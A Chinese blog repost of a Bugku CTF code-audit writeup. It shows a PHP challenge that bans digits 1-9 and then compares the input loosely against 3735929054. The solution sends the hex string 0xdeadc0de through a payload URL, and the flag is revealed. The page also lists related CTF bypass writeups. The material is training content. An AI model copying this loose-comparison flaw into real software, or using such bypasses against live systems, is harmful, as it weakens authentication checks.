代码审计-十六进制与数字比较

最新推荐文章于 2021-03-10 17:01:57 发布
最新推荐文章于 2021-03-10 17:01:57 发布
阅读量339 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/gaonuoqi/p/11408145.html
版权 
<?php
error_reporting(0);

function noother_says_correct($temp)
{
$flag = 'flag{test}';
$one = ord('1'); //ord — 返回字符的 ASCII 码值
$nine = ord('9'); //ord — 返回字符的 ASCII 码值
$number = '3735929054';

// Check all the input characters!
for ($i = 0; $i < strlen($number); $i++)
{
// Disallow all the digits!
$digit = ord($temp{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
// Aha, digit not allowed!
return "flase";
}
}
if($number == $temp)
return $flag;
}

$temp = $_GET['password'];
echo noother_says_correct($temp);
?>

password包含number的值3735929054,又不能有1和9

将number的值转化为16进制

payload

http://123.206.87.240:9009/20.php?password=0xdeadc0de

 

flag{Bugku-admin-ctfdaimash}

转载于:https://www.cnblogs.com/gaonuoqi/p/11408145.html

diemozao8175
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4393
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
bugku__PHP代码审计-十六进制数字比较
kuller_Yan的博客
10-21 145
bugku__PHP代码审计-十六进制数字比较 <?php error_reporting(0); function noother_says_correct($temp) { $flag = 'flag{test}'; $one = ord('1'); //ord — 返回字符的 ASCII 码值 $nine = ord('9'); //ord — 返回字符的 ASCII 码值 $number = '3735929054'; // Check all the input characters! f
php 字符如何与16进制比较大小
qq_41221841的博客
07-08 599
if ("A" < chr(0x80)) echo "true";
linux中数字对比大小
weixin_30247159的博客
07-14 1408
-gt -lt -eq -ne -ge -le -gt: large than 大于 -lt:less than 小于 -eq:equal 等于 -ne:不等于 not equal -ge:大于等于 -le:小于等于 转载于:https://www.cnblogs.com/lzh900926/p/5669479.html...
PHP代码审计之函数漏洞(下)
JBlock的博客
03-13 4667
前言 此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞,分为上下两节,此为下节!此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正! 目录 前言 正文 md5()引发的注入 md5加密相等绕过 数字验证正则绕过 md5函数验证绕过 十六进制数字比较绕过 后记 正文 md5()引发的注入 &lt;?php $password=$_POST...
BugkuCTF-十六进制数字比较
臭nana的博客
12-14 2642
首先分析代码,函数要求变量$temp不能存在1~9之间的数字, 最后,又要求$temp=3735929054; 这本来是自相矛盾的,但php在转码时会把16进制转化为十进制.于是把 3735929054转换成16进制为0xdeadc0de,记得带上0x; 构造payload ?password=0xdeadc0de 拿到flag ...
bugku代码审计——WP
Hydra的博客
10-30 1220
目录   1.extract变量覆盖 2. strcmp比较字符串 3.urldecode二次编码绕过 4.md5()函数 5.数组返回NULL绕过 6.弱类型整数大小比较绕过 7.sha()函数比较绕过 8. md5加密相等绕过 9.十六进制数字比较 10. 变量覆盖 11.ereg正则%00截断 12.strpos数组绕过 13.数字验证正则绕过 1.extra...
南邮CTF:WEB 起名字真难
笔记
04-26 2224
条件: &lt;?php function noother_says_correct($number) { $one = ord('1'); $nine = ord('9'); for ($i = 0; $i &lt; strlen($number); $i++) { $digit = ord(...
【BUGKUCTF】代码审计wp
0nc3的博客
03-05 303
先放出解题情况,变量覆盖和绕过waf进不了就没做了 1.extract变量覆盖 题目链接:http://123.206.87.240:9009/1.php &amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content)...
PHP代码审计总结(2)
qq_40529133的博客
05-05 609
1, strpos数组绕过NULL与ereg正则%00截断 <?php $flag = "flag"; if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; ...
bugku-代码审计 writeup
Peithon的博客
04-29 6063
代码审计 在做bugku 代码审计的题时,发现有好多函数的绕过是之前没留意到的,记录一下 1.extract变量覆盖 题目地址:http://120.24.86.145:9009/1.php &lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)...
php 判断是否是16进制,php解码或解析每个十六进制的半字节
weixin_28758189的博客
03-10 720
您可以提取直接从字符串中的每个蚕食它这样比较:$data = '0x 1121 0031';$data = substr($data, 2); //remove the 0x prefix from the string$data = str_replace(' ', '', $data); //remove the spaces from the string//$data is now '11...
PHP弱类型比较总结
baynk的博客
08-19 3979
这个用来记录总结碰到的php弱类型比较,持续更新。 0x01 字符串和数字比较 var_dump('a' == 0); //bool(true) var_dump('1a' == 1); //bool(true) var_dump('12a' == 1); //bool(false) 会出现上面的结果是因为字符串在和数字比较的时候会将字符串转化为数字,比如a转换失败成False,False又和0...
比较两个二进制数字的不同数字
HuiDiExAg的博客
05-22 1003
include<stdio.h> include<stdlib.h> int main() { int n = 0; int m = 0; int i = 0; int count = 0; scanf("%d %d", &n, &m); for (i = 0; i < 32; i++) { if (((m >> i) &...
PHP实现把较大的十进制转换成十六进制
church的专栏
04-11 2695
实现原理非常简单, 不断地除以16,直到商为0,再把余数倒序拼接起来: function bc_dechex($decimal) { $result = []; while ($decimal != 0) { $mod = $decimal % 16; $decimal = floor($decimal / 16); arra...
BugkuCTF(代码审计) WriteUp
CallMeSa1tyFish的博客
08-06 3680
代码审计部分 extract变量覆盖 题目 &amp;amp;amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; }else{ ...
C++中int型数据的十六进制写法
热门推荐
zaqwsx20的专栏
04-10 1万+
在C++中int类型一般表示一个有符号的32位整数。在一些情况下(例如进行位操作时)我们需要使用十六进制的方式来表示int类型。 C++中十六进制的表示方法为使用”0x“前缀后面跟十六进制数据,对于32位整数来说最多需要8个十六进制数位来表示。 书写的方式与十进制类似,从高位到低位,未书写的高位默认为0。 即: 0x01 与 0x00000001相同,都表示十进制的 1。 int型最高位
PHP代码审计-php-hash比较缺陷
最新发布
07-08
对于PHP代码审计中的php-hash比较缺陷,我可以给你一些相关的信息。在PHP中,使用"=="操作符进行字符串比较时,存在一些问题。这是因为"=="操作符在比较字符串时会进行类型转换,可能导致意外的结果。具体来说,当...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值